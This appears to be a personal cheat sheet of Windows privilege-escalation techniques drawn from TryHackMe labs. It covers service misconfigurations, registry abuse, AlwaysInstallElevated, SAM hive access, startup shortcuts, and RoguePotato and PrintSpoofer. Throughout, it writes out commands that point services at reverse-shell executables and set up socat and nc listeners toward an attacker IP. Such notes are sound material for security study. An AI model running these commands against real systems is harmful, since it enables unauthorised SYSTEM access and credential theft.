Windows
Credits - TryHackMe and many more [Will try my best to mention them :) ]...
- Registry HKLM is for all users, HKCU is for the current user. - Check security groups of current user
whoami /Groups
net user <username>1. Insecure Service Permissions
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
sc qc <service=daclsvc>
# Elevated Privileges as ‘SERVICE_START_NAME : LocalSystem’
sc config <service=daclsvc> binpath="<path-to-reverse-shell>"
sc start <service=daclsvc>2. Unquoted Service Path
sc qc unquotedsvc
accesschk.exe -d “C:\Program Files\Unquoted Path Service\”
copy reverse.exe “C:\Program Files\Unquoted Path Service\Common”
sc start unquotedsvc3. Weak Registry Permissions NT AUTHORITY\INTERACTIVE = All logged-in users REG_EXPAND_SZ : An expandable data string. REG_SZ : This data type has a fixed length.
sc qc regsvc
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell>4. Insecure Service Executables
5. Registry Autoruns [Todo]
6. Registry AlwaysInstallElevated
set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
7. Passwords in Registry
8. Retrieve password from SAM SYSTEM registry hives
- SAM registry is not accessible
reg query HKLM\SAM\SAM
ERROR: Access is denied.
9. If creds are saved from a previous user [run exe from a folder which belongs to the admin/higher privilege user]
10. Pass the Hash (pth)
11. Task running every few intervals Append “path-to-exec” at the end of PowerShell script 12. Insecure GUI Apps file > open > navigation pane > C:\Windows\System32\cmd.exe 13. Startup Apps [createshortcut.vbs] Adding shortcut to reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" 14. RoguePotato Attack
• You need a compromised account on the victim machine with Impersonate privileges s0- whomai /priv [SeImpersonatePrivilege is Enabled] s1- sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:<IP of target>:9999 s2- nc -nlvp <port-used-in-reverse-exec> s3 - when running as “nt authority\local service” RoguePotato.exe -r <IP of attacker> -e "<path-to-exec>" -l 9999 - run as a local service "nt authority\local service" C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe" -or- C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 15. PrintSpoofer PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i - Tools winpeasany.exe seatbelt.exe all full sharp.exe audit JAWS [works in the presence of AV solutions]
- Powerup
- List of Exploitable Privileges
- SeImpersonate
Last updated
Was this helpful?